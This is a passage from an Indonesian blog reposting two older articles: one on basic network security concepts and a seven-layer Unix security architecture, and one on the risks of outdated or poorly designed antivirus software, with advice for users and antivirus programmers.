Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang 'menakutkan' dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

* resiko / tingkat bahaya,
* ancaman, dan
* kerapuhan sistem (vulnerability)


Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

* Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
* Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
* Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.
Network security : apa dan bagaimana
Oleh : Joko Yuliantoro & Onno W. Purbo

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

* Lapis ke-7 : Kebijaksanaan
* Lapis ke-6 : Personil
* Lapis ke-5 : Local Area Network
* Lapis ke-4 : Batas Dalam Jaringan
* Lapis ke-3 : Gateway
* Lapis ke-2 : Paket Filtering
* Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah "penyangga" yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.
Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep "TCP Wrapper". Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. "sockd" dijalankan oleh "inetd" pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

sumber :klik-kanan.com

Bahaya Program Anti Virus

Posted on 17.33 by CS-31

Bahaya Program Anti Virus
Oleh : Yohanes Nugroho

Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.

Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.

Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.

Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.

Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada. Selain terjadi pada kasus virus DenHard, kasus inipun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user.

SUMBER BAHAYA PROGRAM ANTIVIRUS

Program Antivirus bisa berbahaya karena sebab-sebab berikut:

* Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.
* Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal.
* Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.
* Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.
* Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang.
INILAH YANG PERLU ANDA LAKUKAN SEBAGAI PENGGUNA

Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus

1. Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.
2. Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).
3. Buatlah cadangan untuk data dan program Anda yang penting.
4. Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus
5. Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.
6. Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda.

Langkah proses pembersihan yang baik adalah sebagai berikut

Jika Anda menjalankan komputer pribadi

1. Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
2. Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
3. Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
4. Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar). File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.

Jika Anda adalah Admin jaringan, sebaiknya Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!). Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.

SEBAGAI PROGRAMMER INI YANG PERLU ANDA LAKUKAN

Saat ini untuk menjadi programmer antivirus yang baik tidaklah mudah, Anda perlu tahu teknik-teknik pemrograman virus yang setiap hari semakin bertambah sulit. Program antivirus yang Anda buat sebaiknya juga mengikuti perkembangan teknologi virus. Untuk membuat program antivirus yang baik tidaklah mudah, namun ada beberapa hal yang perlu Anda ingat sebagai pembuat Antivirus jika Anda ingin program Anda dipakai orang lain, dan tidak membahayakan orang tersebut

1. Program Anda sebaiknya bisa mematikan virus di memori, dan dapat memberi peringatan jika ada sesuatu yang aneh di memori komputer pemakai (misalnya besar base mem kurang dari 640 Kb)
2. Dalam membuat ID virus pilihlah beberapa lokasi, lokasi yang baik adalah di awal virus dan di bagian penting virus (misalnya di bagian dekripsi header program asli) ini untuk memastikan tidak ada yang mengubah lokasi dan sistem enkripsi (jika ada) header program asli.
3. Jika data/header di enkrip, verifikasikan data yang didapat dari perhitungan, misalnya lihat apakah CS dan IP asli yang di dapat dari perhitungan masih dalam batas besar file, atau apakah instruksi JMP pertama di file COM masuk akal (kurang dari panjang file).
4. Buat cadangan file jika file yang dibersihkan dikhawatirkan rusak
5. Lakukan self check di awal program. Jika tidak seluruh bagian program bisa di self check, bagian ID virus perlu diperiksa apakah berubah atau tidak (misalnya dengan checksum).
6. Buatlah penjelasan yang jelas tentang cara penggunaan antivirus
7. Jika program hanya dapat dijalankan di DOS periksalah selalu ketika program dijalankan apakah program tersebut benar-benar berjalan di DOS
8. Jika ingin membuat program antivirus residen, jangan memakai ID virus yang tidak terenkripsi di memori, antivirus lain yang tidak mengenal antivirus Anda tersebut, justru akan menganggap adanya sebuah (atau beberapa buah) virus aktif di memori. Hal ini bisa terjadi, karena beberapa antivirus memeriksa seluruh memori terhadap adanya ID virus.
9. Untuk antivirus yang non residen teknik no 8 juga perlu digunakan, ini perlu agar program antivirus yang lain tidak mengira program ini terkena virus. Kadang-kadang program juga meninggalkan bekas di memori, yang mungkin bisa dicurigai oleh antivirus lain sebagai virus. Jika Anda tidak ingin menerapkan teknik tersebut, Anda bisa menghapus memori variabel ID virus setelah selesai digunakan.
10. Jika mungkin, untuk virus yang polimorfik gunakan metode heuristic (dan atau emulasi) untuk men-scan dan teknik emulasi untuk mendekrip, atau mengembalikan program asli.

Seharusnya 10 hal tersebut cukup, Anda bisa menambahkan sendiri hal tersebut jika perlu. Misalnya masalah kecepatan scanning dan lain-lain.
Simpulan dan penutup

Kiranya setelah membaca artikel di atas, para pemakai dan programmer antivirus dapat mendapatkan pengetahuan yang baru mengenai antivirus komputer. Sebagai pemakai antivirus, Anda harus lebih hati-hati, dan dengan rajin mengupdate antivirus Anda. Hal ini sangat perlu dilakukan, terutama bagi Anda yang terhubung ke Internet, sudah banyak virus yang menyebarkan dirinya lewat e-mail, dan dengan memanfaatkan beberapa bug dari perangkat email client Anda beberapa virus dapat menyebar tanpa Anda sadari (saat artikel ini dibuat, ada laporan dari sumber yang terpercaya bahwa ada bug di outlook yang memungkinkan attachment di eksekusi tanpa diketahui user).

Bagi para programmer antivirus, kiranya Anda tergerak untuk mempelajari lagi lebih banyak mengenai teknik-teknik virus, dan teknik-teknik untuk membasminya. Saat ini penulis virus di Indonesia belum terlalu banyak, tapi nanti ketika muncul berbagai virus dengan teknologi tinggi buatan bangsa sendiri, tentunya kita harus bisa membasminya (dengan baik dan benar tentunya), tidakkah kita akan malu, jika harus menggantungkan diri pada antivirus buatan luar negeri?.

Artikel ini bukanlah artikel yang lengkap mengenai pembuatan program antivirus yang baik, juga bukan tutorial yang lengkap mengenai penggunaan antivirus dengan baik dan benar, melainkan hanya sebuah artikel singkat agar para pemakai dan programmer lebih mewaspadai virus dengan lebih memperhatikan aspek antivirusnya.

sumber : klik-kanan.com